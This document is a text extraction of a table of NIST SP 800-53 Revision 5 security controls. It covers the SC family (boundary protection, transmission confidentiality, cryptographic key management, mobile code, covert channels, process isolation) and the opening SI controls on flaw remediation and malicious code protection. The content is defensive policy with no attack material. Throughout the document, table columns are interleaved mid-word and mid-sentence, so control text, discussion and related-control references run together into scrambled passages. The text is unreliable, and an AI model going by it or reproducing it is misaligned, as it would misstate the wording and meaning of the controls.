thenoncritical
Internet
networks.
communications addition,
organizational and
SC-7(29) Boundary Protection | Separate Subnets to Isolate Functions Implement [Selection: physically; logically] separate subnetworks to isolate the following critical Separating
information critical
flows between components
unclassified and functions
non-national from
security other
systems and system
external components
networks. None.
system extranets withthrough
public access.
SC-8 Transmission Confidentiality and Integrity Protect components
the [Selectionand functions:
(one or more):[Assignment:
confidentiality;organization-defined critical information.
integrity] of transmitted system components and functions
Protecting the confidentialityseparate and subnetworks
integrity of may be necessary
transmitted to reduce
information susceptibility
applies to internaltoand a AC-17, AC-18, AU-10, IA-3, IA-8, IA-9, MA-4, PE-4, SA-4, SA-8, SC-7, SC-16, SC-20, SC-23,
and functions]. catastrophic
external networksor debilitating
well asbreach
asinformation any from or compromise
system components thatthat
results in systeminformation,
can transmit failure. For example,
including SC-28.
SC-8(1) Transmission Confidentiality and Integrity | Cryptographic Protection Implement cryptographic mechanisms to [Selection (one or more): prevent unauthorized disclosure of Encryption
physically protects
separating the command unauthorized
andcomputers,
control function disclosure and modification during transmission.
function SC-12, SC-13.
servers, notebook computers, desktop mobilefrom the in-flight
devices, printers,entertainment
copiers, scanners,
SC-8(2) Transmission Confidentiality and Integrity | Pre- and Post-transmission Handling Maintain the [Selection (one or more): confidentiality; integrity] of information during preparation facsimile Information can be unintentionally
machines, or maliciously
and radios. Unprotected disclosed orpaths
communication modified during preparation
are exposed for of None.
to the possibility
SC-8(3) Transmission Confidentiality and Integrity | Cryptographic Protection for Message Externals for transmission and during reception.
Implement cryptographic mechanisms to protect message externals unless otherwise protected by [Ass transmission or during reception, including during aggregation, at protocol
Cryptographic protection for message externals addresses protection from the unauthorized disclosure transformation points, SC-12, SC-13.
and during packing and unpacking. Such unauthorized disclosures or modifications compromise the
SC-8(4) Transmission Confidentiality and Integrity | Conceal or Randomize Communications Implement cryptographic mechanisms to conceal or randomize communication patterns unless otherwis Concealing or randomizing
confidentiality or integrity of communication
the information. patterns addresses protection from unauthorized disclosure SC-12,
o SC-13.
SC-8(5) Transmission Confidentiality and Integrity | Protected Distribution System Implement [Assignment: organization-defined protected distribution system] to [Selection (one or The purpose of a protected distribution system is to deter, detect, and/or make difficult physical None.
SC-13(3) Cryptographic Protection | Individuals Without Formal Access Approvals more): prevent
[Withdrawn: unauthorized
Incorporated intodisclosure
SC-13.] of information; detect changes to information] during access to the communication lines that carry national security information.
transmission.
SC-10 Network Disconnect Terminate the network connection associated with a communications session at the end of the session Network disconnect applies to internal and external networks. Terminating network connections associa AC-17, SC-23.
SC-11 Trusted Path a. Provide a [Selection: physically; logically] isolated trusted communications path for Trusted paths are mechanisms by which users can communicate (using input devices such as keyboards) AC-16, AC-25, SC-12, SC-23.
SC-11(1) Trusted Path | Irrefutable Communications Path communications
(a) Provide a trusted between the user andpath
communications the that
trusted components
is irrefutably of the system;
distinguishable from andother An irrefutable communications path permits the system to initiate a trusted path, which None.
SC-12 Cryptographic Key Establishment and Management communications
Establish and manage paths;cryptographic
and keys when cryptography is employed within the system in accorda necessitates
Cryptographic that
keythe user can unmistakably
management and establishmentrecognize canthe
be source
performed of the communication
using manual proceduresas a trusted
or automate
AC-17, AU-9, AU-10, CM-3, IA-3, IA-7, SA-4, SA-8, SA-9, SC-8, SC-11, SC-12, SC-13, SC-17,
system component. For example, the trusted path may appear in an area of the display that other SC-20, SC-37, SC-40, SI-3, SI-7.
SC-12(1) Cryptographic Key Establishment and Management | Availability Maintain availability of information in the event of the loss of cryptographic keys by users. Escrowing of encryption keys is a common practice for ensuring availability
applications cannot access or be based on the presence of an identifier that cannot be spoofed. in the event of key loss. None.
SC-12(2) Cryptographic Key Establishment and Management | Symmetric Keys Produce, control, and distribute symmetric cryptographic keys using [Selection: NIST FIPS-validated; SP A forgotten
800-56A,passphrase
SP 800-56B,isand an example
SP 800-56C of losing
provide a cryptographic key.
guidance on cryptographic key establishment None.
SC-12(3) Cryptographic Key Establishment and Management | Asymmetric Keys NSA-approved] key management technology and processes. schemes and key derivation methods. SP 800-57-1,
Produce, control, and distribute asymmetric cryptographic keys using [Selection: NSA-approved key SP 800-56A, SP 800-56B, and SP 800-56C provide guidance on cryptographic key establishment SP 800-57-2, and SP 800-57-3 provide guidance None.
managementIncorporated
technology and on cryptographic
and key key management.
SC-13(4) Cryptographic Protection | Digital Signatures [Withdrawn: intoprocesses;
SC-13.] prepositioned keying material; DoD-approved or DoD- schemes derivation methods. SP 800-57-1, SP 800-57-2, and SP 800-57-3 provide guidance
issued Medium Assurance PKI certificates; DoD-approved or DoD-issued Medium Hardware on cryptographic key management.
SC-14 Public Access Protections [Withdrawn:
Assurance PKIIncorporated intohardware
certificates and AC-2, AC-3, AC-5, AC-6,
security tokensSI-3,
thatSI-4, SI-5,the
protect SI-7,user’s
and SI-10.]
private key;
SC-12(6) Cryptographic Key Establishment and Management | Physical Control of Keys Maintain physical control of cryptographic keys when stored information is encrypted by external For organizations that use external service providers (e.g., cloud service or data center providers), None.
SC-13 Cryptographic Protection service
a. providers.
Determine the [Assignment: organization-defined cryptographic uses]; and physical control
Cryptography canofbecryptographic
employed tokeys provides
support additional
a variety assurance
of security that including
solutions, information thestored by of AC-2, AC-3, AC-7, AC-17, AC-18, AC-19, AU-9, AU-10, CM-11, CP-9, IA-3, IA-5, IA-7, MA-4,
protection
b. ImplementIncorporated
the followingintotypes of cryptography required for each specified cryptographic use: such external providers is not subject to unauthorized disclosure or modification. MP-2, MP-4, MP-5, SA-4, SA-8, SA-9, SC-8, SC-12, SC-20, SC-23, SC-28, SC-40, SI-3, SI-7.
SC-15(2) Collaborative Computing Devices and Applications | Blocking Inbound and Outbound [Withdrawn: SC-7.]
Communications Traffic [Assignment: organization-defined types of cryptography for each specified cryptographic use].
SC-19 Voice Over Internet Protocol [Withdrawn: Technology-specific; addressed as any other technology or protocol.]
SC-20(1) Secure Name/address Resolution Service (authoritative Source) | Child Subspaces [Withdrawn: Incorporated into SC-20.]
SC-21(1) Secure Name/address Resolution Service (recursive or Caching Resolver) | Data Origin and Integrity [Withdrawn: Incorporated into SC-21.]
SC-23(2) Session Authenticity | User-initiated Logouts and Message Displays [Withdrawn: Incorporated into AC-12(1).]
SC-15 Collaborative Computing Devices and Applications a. Prohibit remote activation of collaborative computing devices and applications with the following Collaborative computing devices and applications include remote meeting devices and applications, nAC-21, SC-42.
SC-15(1) Collaborative Computing Devices and Applications | Physical or Logical Disconnect exceptions:
Provide [Assignment:
[Selection (one ororganization-defined
more): physical; logical] exceptions where
disconnect remote activation
of collaborative is to be
computing devices in Failing to disconnect from collaborative computing devices can result in subsequent compromises None.
allowed];
manner and
a[Withdrawn:thatIncorporated
supports ease of SC-23(3).]
use. of organizational information. Providing easy methods to disconnect from such devices after a
SC-23(4) Session Authenticity | Unique Session Identifiers with Randomization into
collaborative computing session ensures that participants carry out the disconnect activity without
SC-15(3) Collaborative Computing Devices and Applications | Disabling and Removal in Secure Work Areas Disable or remove collaborative computing devices and applications from [Assignment: Failing
having to disable
go through or remove
complex collaborative
and tediouscomputing
procedures. devices and applications
Disconnect from systems
from collaborative computingor None.
organization-defined systems or system components] in [Assignment: organization-defined secure system components can result in compromises of information, including eavesdropping on
work areas]. conversations. A Sensitive Compartmented Information Facility (SCIF) is an example of a secure
work area.

11 of 2021-01-21
 NIST SP 800-53, Revision 5, Security and Privacy Controls for Information Systems and Organizations

SC-15(4) Collaborative Computing Devices and Applications | Explicitly Indicate Current Participants Provide an explicit indication of current participants in [Assignment: organization-defined online Explicitly indicating current participants prevents unauthorized individuals from participating in None.
SC-16 Transmission of Security and Privacy Attributes meetings
Associate and teleconferences].
[Assignment: organization-defined security and privacy attributes] with information ex collaborative computing
Security and privacy sessions
attributes canwithout the explicit
be explicitly knowledge
or implicitly of other
associated participants.
with the information contain AC-3, AC-4, AC-16.
SC-16(1) Transmission of Security and Privacy Attributes | Integrity Verification Verify the integrity of transmitted security and privacy attributes. Part of verifying the integrity of transmitted information is ensuring that security and privacy attri AU-10, SC-8.
SC-16(2) Transmission of Security and Privacy Attributes | Anti-spoofing Mechanisms Implement anti-spoofing mechanisms to prevent adversaries from falsifying the security attributes indi Some attack vectors operate by altering the security attributes of an information system to intentionaSI-3, SI-4, SI-7.
SC-16(3) Transmission of Security and Privacy Attributes | Cryptographic Binding Implement [Assignment: organization-defined mechanisms or techniques] to bind security and privacy Cryptographic mechanisms and techniques can provide strong security and privacy attribute binding tAC-16, SC-12, SC-13.
SC-17 Public Key Infrastructure Certificates a. Issue public key certificates under an [Assignment: organization-defined certificate policy] or Public key infrastructure (PKI) certificates are certificates with visibility external to organizational s AU-10, IA-5, SC-12.
SC-18 Mobile Code obtain public key certificates from an approved service provider; and
a. Define acceptable and unacceptable mobile code and mobile code technologies; and Mobile code includes any program, application, or content that can be transmitted across a network AU-2, AU-12, CM-2, CM-6, SI-3.
SC-18(1) Mobile Code | Identify Unacceptable Code and Take Corrective Actions b. Authorize,
Identify monitor,organization-defined
[Assignment: and control the use of mobile codemobile
unacceptable within code]
the system.
and take [Assignment: Corrective actions when unacceptable mobile code is detected include blocking, quarantine, or None.
SC-18(2) Mobile Code | Acquisition, Development, and Use organization-defined corrective
Verify that the acquisition, actions]. and use of mobile code to be deployed in the system
development, alerting
None. administrators. Blocking includes preventing the transmission of word processing files with None.
meets [Assignment: organization-defined mobile code requirements]. embedded macros when such macros have been determined to be unacceptable mobile code.
SC-18(3) Mobile Code | Prevent Downloading and Execution Prevent the download and execution of [Assignment: organization-defined unacceptable mobile None. None.
SC-18(4) Mobile Code | Prevent Automatic Execution code].
Prevent the automatic execution of mobile code in [Assignment: organization-defined software Actions enforced before executing mobile code include prompting users prior to opening email None.
SC-18(5) Mobile Code | Allow Execution Only in Confined Environments applications]
Allow executionandofenforce [Assignment:
permitted mobile codeorganization-defined actions]
only in confined virtual prior to
machine executing the code. attachments
environments. Permitting theorexecution
clicking onofweb links.
mobile Preventing
code the automatic
only in confined virtualexecution of mobile codehelps
machine environments includes
preven SC-44, SI-7.
disabling auto-execute features on system components that employ portable storage devices, such
SC-26(1) Decoys | Detection of Malicious Code [Withdrawn: Incorporated into SC-35.] as compact discs, digital versatile discs, and universal serial bus devices.
SC-20 Secure Name/address Resolution Service (authoritative Source) a. Provide additional data origin authentication and integrity verification artifacts along with the Providing authoritative source information enables external clients, including remote Internet clien AU-10, SC-8, SC-12, SC-13, SC-21, SC-22.
SC-30(1) Concealment and Misdirection | Virtualization Techniques authoritative name resolution
[Withdrawn: Incorporated intodata the system returns in response to external name/address
SC-29(1).]
resolution queries; and
SC-20(2) Secure Name/address Resolution Service (authoritative Source) | Data Origin and Integrity Provide data origin and integrity protection artifacts for internal name/address resolution queries. None. None.
SC-21 Secure Name/address Resolution Service (recursive or Caching Resolver) Request and perform data origin authentication and data integrity verification on the name/address Each client of name resolution services either performs this validation on its own or has authentica SC-20, SC-22.
SC-33 Transmission Preparation Integrity [Withdrawn: Incorporated into SC-8.]
SC-22 Architecture and Provisioning for Name/address Resolution Service Ensure the systems that collectively provide name/address resolution service for an organization are Systems that provide name and address resolution services include domain name system (DNS) servers. SC-2,
T SC-20, SC-21, SC-24.
SC-23 Session Authenticity Protect the authenticity of communications sessions. Protecting session authenticity addresses communications protection at the session level, not at the pAU-10, SC-8, SC-10, SC-11.
SC-23(1) Session Authenticity | Invalidate Session Identifiers at Logout Invalidate session identifiers upon user logout or other session termination. Invalidating session identifiers at logout curtails the ability of adversaries to capture and continue to None.
SC-34(3) Non-modifiable Executable Programs | Hardware-based Protection [Withdrawn: Moved to SC-51.] employ previously valid session IDs.
SC-23(3) Session Authenticity | Unique System-generated Session Identifiers Generate a unique session identifier for each session with [Assignment: organization-defined randomGenerating unique session identifiers curtails the ability of adversaries to reuse previously valid ses AC-10, SC-12, SC-13.
SC-4(1) Information in Shared System Resources | Security Levels [Withdrawn: Incorporated into SC-4.]
SC-23(5) Session Authenticity | Allowed Certificate Authorities Only allow the use of [Assignment: organization-defined certificate authorities] for verification of th Reliance on certificate authorities for the establishment of secure sessions includes the use of Transpo SC-12, SC-13.
SC-24 Fail in Known State Fail to a [Assignment: organization-defined known system state] for the following failures on the in Failure in a known state addresses security concerns in accordance with the mission and business needs CP-2, CP-4, CP-10, CP-12, SA-8, SC-7, SC-22, SI-13.
SC-25 Thin Nodes Employ minimal functionality and information storage on the following system components: [Assign The deployment of system components with minimal functionality reduces the need to secure every end SC-30, SC-44.
SC-26 Decoys Include components within organizational systems specifically designed to be the target of malicious aDecoys (i.e., honeypots, honeynets, or deception nets) are established to attract adversaries and de RA-5, SC-7, SC-30, SC-35, SC-44, SI-3, SI-4.
SC-42(3) Sensor Capability and Data | Prohibit Use of Devices [Withdrawn: Incorporated into SC-42.]
SC-27 Platform-independent Applications Include within organizational systems the following platform independent applications: [Assignment:Platforms are combinations of hardware, firmware, and software components used to execute software SC-29.
ap
SC-28 Protection of Information at Rest Protect the [Selection (one or more): confidentiality; integrity] of the following information at rest: Information at rest refers to the state of information when it is not in process or in transit and is AC-3, AC-4, AC-6, AC-19, CA-7, CM-3, CM-5, CM-6, CP-9, MP-4, MP-5, PE-3, SC-8, SC-12,
SC-28(1) Protection of Information at Rest | Cryptographic Protection Implement cryptographic mechanisms to prevent unauthorized disclosure and modification of the folThe selection of cryptographic mechanisms is based on the need to protect the confidentiality and intSC-13, AC-19, SC-34,
SC-12, SI-3,
SC-13.SI-7, SI-16.
SC-28(2) Protection of Information at Rest | Offline Storage Remove the following information from online storage and store offline in a secure location: Removing organizational information from online storage to offline storage eliminates the None.
SC-28(3) Protection of Information at Rest | Cryptographic Keys [Assignment: organization-defined
Provide protected information].
storage for cryptographic keys [Selection: [Assignment: organization-defined safe possibility of individuals
A Trusted Platform Modulegaining
(TPM)unauthorized
is an example access to the information through
of a hardware-protected a network.
data store that can be usedSC-12, SC-13.
Therefore, organizations may choose to move information to offline storage in lieu of protecting
SC-29 Heterogeneity Employ a diverse set of information technologies for the following system components in the imple such Increasing the diversity
information of information
in online storage. technologies within organizational systems reduces the impac AU-9, PL-8, SC-27, SC-30, SR-3.
SC-29(1) Heterogeneity | Virtualization Techniques Employ virtualization techniques to support the deployment of a diversity of operating systems and While frequent changes to operating systems and applications can pose significant configuration None.
SC-30 Concealment and Misdirection applications that are changed
Employ the following [Assignment:
concealment organization-defined
and misdirection frequency].
techniques for [Assignment: organization-definedmanagement
Concealment and challenges, the changes
misdirection techniquescan result in an increased
can significantly reduce workthefactor for adversaries
targeting capabilities toof adve AC-6, SC-25, SC-26, SC-29, SC-44, SI-14.
conduct successful attacks. Changing virtual operating systems or applications, as opposed to
SC-7(1) Boundary Protection | Physically Separated Subnetworks [Withdrawn: Incorporated into SC-7.] changing actual operating systems or applications, provides virtual changes that impede attacker
SC-30(2) Concealment and Misdirection | Randomness Employ [Assignment: organization-defined techniques] to introduce randomness into organizational Randomness introduces increased levels of uncertainty for adversaries regarding the actions that None.
SC-30(3) Concealment and Misdirection | Change Processing and Storage Locations operations
Change theand assets.
location of [Assignment: organization-defined processing and/or storage] [Selection: organizations take critical
Adversaries target to defend their and
mission systems against
business attacks.and
functions Suchtheactions
systemsmaythatimpede
support thethose
ability of None.
[Assignment: organization-defined time frequency]; at random time intervals]]. system adversaries
mission to correctly
andmisleading
business target information
functions while resources
also trying to of organizations
minimize that of
the exposure support
their critical missions
existence and
SC-30(4) Concealment and Misdirection | Misleading Information Employ realistic, but misleading information in [Assignment: organization-defined Employing
or businessThefunctions. information
Uncertainty may is intended
also to confuse
cause adversariespotential
to adversaries regarding the nature None.
components] about itstechniques
security state or posture. tradecraft.
andhiding, static, homogeneous,
extentdisguising,
of controls and deterministic
Thus, nature of hesitate beforesystems
organizational initiatingtargeted
or
SC-30(5) Concealment and Misdirection | Concealment of System Components Employ the following to hide or conceal [Assignment: organization-defined system By
by adversaries make ordeployed
suchconcealing
systems
by critical
organizations. adversaries
system components,
more susceptible to attacks
may employ
organizations
with mayincorrect
less adversary be able
cost
and
andtoeffort to None.
components]: [Assignment: organization-defined techniques]. ineffective
decrease attack
the techniques.
probability that One technique
adversaries forand
target misleading adversaries
successfully is for organizations
compromise those assets. to place
SC-31 Covert Channel Analysis a. Perform a covert channel analysis to identify those aspects of communications within the system misleadingDevelopers information
are in the best position to specific
identify controls
potentialdeployed
areas within systemssystems
that might
thatlead to cove AC-3, AC-4, SA-8, SI-11.
that Potential means to hide,regarding
disguise, the
or conceal system componentsininclude
externalthe configuration areofknown
SC-31(1) Covert Channel Analysis | Test Covert Channels for Exploitability Test are potential
a subset avenues
of the for covert
identified covert channels
[Selectionto(one or more):
determine thestorage;
channelstiming] channels;
that are and
exploitable. None.
routers or the use of encryption or virtualization techniques. None.
SC-31(2) Covert Channel Analysis | Maximum Bandwidth Reduce the maximum bandwidth for identified covert [Selection (one or more): storage; timing] The complete elimination of covert channels, especially covert timing channels, is usually not None.
SC-31(3) Covert Channel Analysis | Measure Bandwidth in Operational Environments channels to [Assignment: organization-defined values]. possible without significant performance impacts.
Measure the bandwidth of [Assignment: organization-defined subset of identified covert channels] Measuring covert channel bandwidth in specified operational environments helps organizations None.
SC-32 System Partitioning in the operational
Partition the systemenvironment of the system.
into [Assignment: organization-defined system components] residing in separatedetermine how much
System partitioning information
is part can be covertlyprotection
of a defense-in-depth leaked before suchOrganizations
strategy. leakage adversely affectsthe d AC-4, AC-6, SA-8, SC-2, SC-3, SC-7, SC-36.
determine
mission or business functions. Covert channel bandwidth may be significantly different when
SC-32(1) System Partitioning | Separate Physical Domains for Privileged Functions Partition privileged functions into separate physical domains. Privileged functions
measured in settingsthat
thatoperate in a singleof
are independent physical domain
the specific may represent
environments a single point
of operation, of failure None.
including
SC-7(2) Boundary Protection | Public Access [Withdrawn: Incorporated into SC-7.] if that domain becomes compromised or experiences a denial of service.
SC-34 Non-modifiable Executable Programs For [Assignment: organization-defined system components], load and execute: The operating environment for a system contains the code that hosts applications, including operatinAC-3, SI-7, SI-14.
SC-34(1) Non-modifiable Executable Programs | No Writable Storage a. The operating
Employ environment
[Assignment: from hardware-enforced,
organization-defined system components] read-only media;
with and
no writeable storage that is perDisallowing writeable storage eliminates the possibility of malicious code insertion via persistent, w AC-19, MP-7.
SC-34(2) Non-modifiable Executable Programs | Integrity Protection on Read-only Media Protect the integrity of information prior to storage on read-only media and control the media afte Controls prevent the substitution of media into systems or the reprogramming of programmable read-on CM-3, CM-5, CM-9, MP-2, MP-4, MP-5, SC-28, SI-3.
SC-7(6) Boundary Protection | Response to Recognized Failures [Withdrawn: Incorporated into SC-7(18).]
SC-35 External Malicious Code Identification Include system components that proactively seek to identify network-based malicious code or malici External malicious code identification differs from decoys in SC-26 in that the components actively p SC-7, SC-26, SC-44, SI-3, SI-4.
SC-36 Distributed Processing and Storage Distribute the following processing and storage components across multiple [Selection: physical loc Distributing processing and storage across multiple physical locations or logical domains provides a CP-6, CP-7, PL-8, SC-32.
SC-36(1) Distributed Processing and Storage | Polling Techniques (a) Employ polling techniques to identify potential faults, errors, or compromises to the following Distributed processing and/or storage may be used to reduce opportunities for adversaries to comproSI-4.
SC-36(2) Distributed Processing and Storage | Synchronization processing
Synchronizeandthestorage
followingcomponents: [Assignment:
duplicate systems or systemorganization-defined distributedorganization-defi
components: [Assignment: processing and SC-36 and CP-9(6) require the duplication of systems or system components in distributed locations. CP-9.
storage components]; and
SC-37 Out-of-band Channels Employ the following out-of-band channels for the physical delivery or electronic transmission of [ Out-of-band channels include local, non-network accesses to systems; network paths physically separa AC-2, CM-3, CM-5, CM-7, IA-2, IA-4, IA-5, MA-4, SC-12, SI-3, SI-4, SI-7.
SC-37(1) Out-of-band Channels | Ensure Delivery and Transmission Employ [Assignment: organization-defined controls] to ensure that only [Assignment: organization- Techniques employed by organizations to ensure that only designated systems or individuals None.
SC-38 Operations Security defined individuals
Employ the followingoroperations
systems] receive the
security following
controls information,
to protect system components,
key organizational informationor devices: receive certain
throughoOperations information,
security (OPSEC) system components,
is a systematic or by
process devices
whichinclude sending
potential authenticators
adversaries via aninfor
can be denied CA-2, CA-7, PL-1, PM-9, PM-12, RA-2, RA-3, RA-5, SC-7, SR-3, SR-7.
[Assignment: organization-defined information, system components, or devices]. approved courier service but requiring recipients to show some form of government-issued
SC-39 Process Isolation Maintain a separate execution domain for each executing system process. Systems can maintain
photographic separate
identification as aexecution
condition domains for each executing process by assigning each proces
of receipt. AC-3, AC-4, AC-6, AC-25, SA-8, SC-2, SC-3, SI-16.
SC-39(1) Process Isolation | Hardware Separation Implement hardware separation mechanisms to facilitate process isolation. Hardware-based separation of system processes is generally less susceptible to compromise than None.
SC-39(2) Process Isolation | Separate Execution Domain Per Thread Maintain a separate execution domain for each thread in [Assignment: organization-defined multi- software-based None. separation, thus providing greater assurance that the separation will be enforced. None.
threaded processing]. Hardware separation mechanisms include hardware memory management.
SC-40 Wireless Link Protection Protect external and internal [Assignment: organization-defined wireless links] from the following si Wireless link protection applies to internal and external wireless communication links that may be visAC-18, SC-5.
SC-40(1) Wireless Link Protection | Electromagnetic Interference Implement cryptographic mechanisms that achieve [Assignment: organization-defined level of protectio The implementation of cryptographic mechanisms for electromagnetic interference protects systemsPE-21, ag SC-12, SC-13.
SC-40(2) Wireless Link Protection | Reduce Detection Potential Implement cryptographic mechanisms to reduce the detection potential of wireless links to [Assignmen The implementation of cryptographic mechanisms to reduce detection potential is used for covert comm SC-12, SC-13.
SC-40(3) Wireless Link Protection | Imitative or Manipulative Communications Deception Implement cryptographic mechanisms to identify and reject wireless transmissions that are delibera The implementation of cryptographic mechanisms to identify and reject imitative or manipulative com SC-12, SC-13, SI-4.
SC-40(4) Wireless Link Protection | Signal Parameter Identification Implement cryptographic mechanisms to prevent the identification of [Assignment: organization-defin The implementation of cryptographic mechanisms to prevent the identification of wireless transmitters SC-12, SC-13.
SC-41 Port and I/O Device Access [Selection: Physically; Logically] disable or remove [Assignment: organization-defined connection p Connection ports include Universal Serial Bus (USB), Thunderbolt, and Firewire (IEEE 1394). Input/outp AC-20, MP-7.
SC-42 Sensor Capability and Data a. Prohibit [Selection (one or more): the use of devices possessing [Assignment: organization- Sensor capability and data applies to types of systems or system components characterized as mobileSC-15. d
SC-42(1) Sensor Capability and Data | Reporting to Authorized Individuals or Roles defined environmental
Verify that the system issensing capabilities]
configured in [Assignment:
so that data or informationorganization-defined facilities, areas, or In situations where sensors are activated by authorized individuals, it is still possible that the data or None.
collected by the [Assignment:
systems]; the remote sensors]
organization-defined activation of
isso environmental
only reported to sensing capabilities
authorized individualsonororganizational
roles. systems or information collected by the sensors will be sent to unauthorized entities.
SC-42(2) Sensor Capability and Data | Authorized Use Employ the following measures that data or information collected by [Assignment:
system components with the following exceptions: [Assignment: organization-defined exceptions organization-de Information collected by sensors for a specific authorized purpose could be misused for some unauthorPT-2.
SC-9 Transmission Confidentiality [Withdrawn: Incorporated into SC-8.]
SC-42(4) Sensor Capability and Data | Notice of Collection Employ the following measures to facilitate an individual’s awareness that personally identifiable in Awareness that organizational sensors are collecting data enables individuals to more effectively engaPT-1, PT-4, PT-5.
SC-42(5) Sensor Capability and Data | Collection Minimization Employ [Assignment: organization-defined sensors] that are configured to minimize the collection of Although policies to control for authorized use can be applied to information once it is collected, miniSA-8, SI-12.
SC-43 Usage Restrictions a. Establish usage restrictions and implementation guidelines for the following system components: Usage restrictions apply to all system components including but not limited to mobile code, mobile d AC-18, AC-19, CM-6, SC-7, SC-18.
SC-44 Detonation Chambers [Assignment: organization-defined
Employ a detonation systemwithin
chamber capability components];
[Assignment:and organization-defined system, system coDetonation chambers, also known as dynamic execution environments, allow organizations to open ema SC-7, SC-18, SC-25, SC-26, SC-30, SC-35, SC-39, SI-3, SI-7.
SC-45 System Time Synchronization Synchronize system clocks within and between systems and system components. Time synchronization of system clocks is essential for the correct execution of many system services AC-3, AU-8, IA-2, IA-8.
SC-45(1) System Time Synchronization | Synchronization with Authoritative Time Source (a) Compare the internal system clocks [Assignment: organization-defined frequency] with Synchronization of internal system clocks with an authoritative source provides uniformity of time None.
SC-45(2) System Time Synchronization | Secondary Authoritative Time Source [Assignment:
(a) organization-defined
Identify a secondary authoritativeauthoritative
time sourcetime thatsource]; and
is in a different geographic region than the It stamps
may be fornecessary
systems with multiple
to employ system clocks
geolocation and systems
information connected
to determine over
that theasecondary
network. None.
SC-46 Cross Domain Policy Enforcement primary
Implement authoritative time source;
a policy enforcement and
mechanism [Selection: physically; logically] between the physical an authoritative timeenforcement
For logical policy source is in amechanisms,
different geographic region.
organizations avoid creating a logical path between inte AC-4, SC-7.
SC-47 Alternate Communications Paths Establish [Assignment: organization-defined alternate communications paths] for system operations An incident, whether adversarial- or nonadversarial-based, can disrupt established communications pa CP-2, CP-8.
SC-48 Sensor Relocation Relocate [Assignment: organization-defined sensors and monitoring capabilities] to [Assignment: orgAdversaries may take various paths and use different approaches as they move laterally through an orga AU-2, SC-7, SI-4.
SC-48(1) Sensor Relocation | Dynamic Relocation of Sensors or Monitoring Capabilities Dynamically relocate [Assignment: organization-defined sensors and monitoring capabilities] to None. None.
SC-49 Hardware-enforced Separation and Policy Enforcement [Assignment: organization-defined
Implement hardware-enforced locations]
separation andunder
policythe following conditions
enforcement mechanismsor circumstances:
between [Assignment: System owners may require additional strength of mechanism and robustness to ensure domain separ AC-4, SA-8, SC-50.
[Assignment: organization-defined conditions or circumstances].
SC-50 Software-enforced Separation and Policy Enforcement Implement software-enforced separation and policy enforcement mechanisms between [Assignment:System owners may require additional strength of mechanism to ensure domain separation and policy AC-3, AC-4, SA-8, SC-2, SC-3, SC-49.
SC-51 Hardware-based Protection a. Employ hardware-based, write-protect for [Assignment: organization-defined system firmware None. None.
components]; and

12 of 2021-01-21
 NIST SP 800-53, Revision 5, Security and Privacy Controls for Information Systems and Organizations

SI-1 Policy and Procedures a. Develop, document, and disseminate to [Assignment: organization-defined personnel or roles]: System and information integrity policy and procedures address the controls in the SI family that are PM-9, PS-8, SA-8, SI-12.
SI-2 Flaw Remediation 1. [Selectionreport,
a. Identify, (one or and more): Organization-level;
correct system flaws; Mission/business process-level; System-level] The need to remediate system flaws applies to all types of software and firmware. Organizations CA-5, CM-3, CM-4, CM-5, CM-6, CM-8, MA-2, RA-5, SA-8, SA-10, SA-11, SI-3, SI-5, SI-7, SI-
system
b. and information
Test software integrity
and firmware policy related
that: to flaw remediation for effectiveness and potential identify systems affected by software flaws, including potential vulnerabilities resulting from those 11.
SI-13(2) Predictable Failure Prevention | Time Limit on Process Execution Without Supervision [Withdrawn: Incorporated intoupdates
SI-7(16).]
side effects before installation; flaws, and report this information to designated organizational personnel with information security
SI-2(2) Flaw Remediation | Automated Flaw Remediation Status Determine if system components have applicable security-relevant software and firmware updates inAutomated and privacy mechanisms
responsibilities. canSecurity-relevant
track and determine updates the status
include ofpatches,
known flaws service forpacks,
systemand components.
malicious CA-7, SI-4.
SI-2(3) Flaw Remediation | Time to Remediate Flaws and Benchmarks for Corrective Actions (a) Measure the time between flaw identification and flaw remediation; and Organizations determine the time it takes on average to correct system flaws after such flaws have None.
SI-2(4) Flaw Remediation | Automated Patch Management Tools (b) Establish
Employ the following
automated benchmarks for
patch management taking
tools corrective
to facilitate flawactions: [Assignment:
remediation organization-
to the following been identified
system Using automated and subsequently
tools to support establish organizational
patch management helps benchmarks
to ensure the (i.e.,timeliness
time frames) and for taking None.
defined benchmarks].
components: [Assignment: organization-defined system components]. corrective actions.
completeness of Benchmarks
system patching can be established by the type of flaw or the severity of the
operations.
SI-2(5) Flaw Remediation | Automatic Software and Firmware Updates Install [Assignment: organization-defined security-relevant software and firmware updates] Due to system
potential integrity
vulnerability ifand
the availability
flaw can beconcerns, exploited.organizations consider the methodology used to None.
SI-2(6) Flaw Remediation | Removal of Previous Versions of Software and Firmware automatically
Remove previous to [Assignment: organization-defined
versions of [Assignment: system components].
organization-defined software and firmware carry out versions
Previous automatic of updates.
software Organizations
or firmware components balance thethat needare tonotensureremovedthat the from updates
the systemare after None.
components] installed have
as soon as installed
possible with theexploited
need to maintain configuration management and control with
SI-3 Malicious Code Protection a. Implement after updated
[Selection (oneversions
or more): have been installed.
signature based; non-signature based] malicious code updates
System
any entryorand
mission
been exit points
operational
may
includebe firewalls, by adversaries.
remote access Some products
servers, workstations, may automatically
electronic mail AC-4, AC-19, CM-3, CM-8, IR-4, MA-3, MA-4, PL-9, RA-5, SC-7, SC-23, SC-26, SC-28, SC-44,
protection mechanisms at system entry and exit points to detect and eradicate malicious code; remove
servers, previous
web versions
servers, proxy ofimpacts
software
servers,
that andautomatic
notebook firmware updates
computers, from the and
might
system.impose.
mobile devices. Malicious code SI-2, SI-4, SI-7, SI-8, SI-15.
SI-2(1) Flaw Remediation | Central Management [Withdrawn: Incorporated into PL-9.]
includes viruses, worms, Trojan horses, and spyware. Malicious code can also be encoded in various
SI-3(1) Malicious Code Protection | Central Management [Withdrawn: Incorporated into PL-9.] formats contained within compressed or hidden files or hidden in files using techniques such as
SI-3(2) Malicious Code Protection | Automatic Updates [Withdrawn: Incorporated into SI-3.]
SI-3(4) Malicious Code Protection | Updates Only by Privileged Users Update malicious code protection mechanisms only when directed by a privileged user. Protection mechanisms for malicious code are typically categorized as security-related software and, CM-5.
SI-3(3) Malicious Code Protection | Non-privileged Users [Withdrawn: Incorporated into AC-6(10).]
SI-3(6) Malicious Code Protection | Testing and Verification (a) Test malicious code protection mechanisms [Assignment: organization-defined frequency] by None. CA-2, CA-7, RA-5.
SI-3(5) Malicious Code Protection | Portable Storage Devices introducing
[Withdrawn:known benign code
Incorporated into the system; and
into MP-7.]
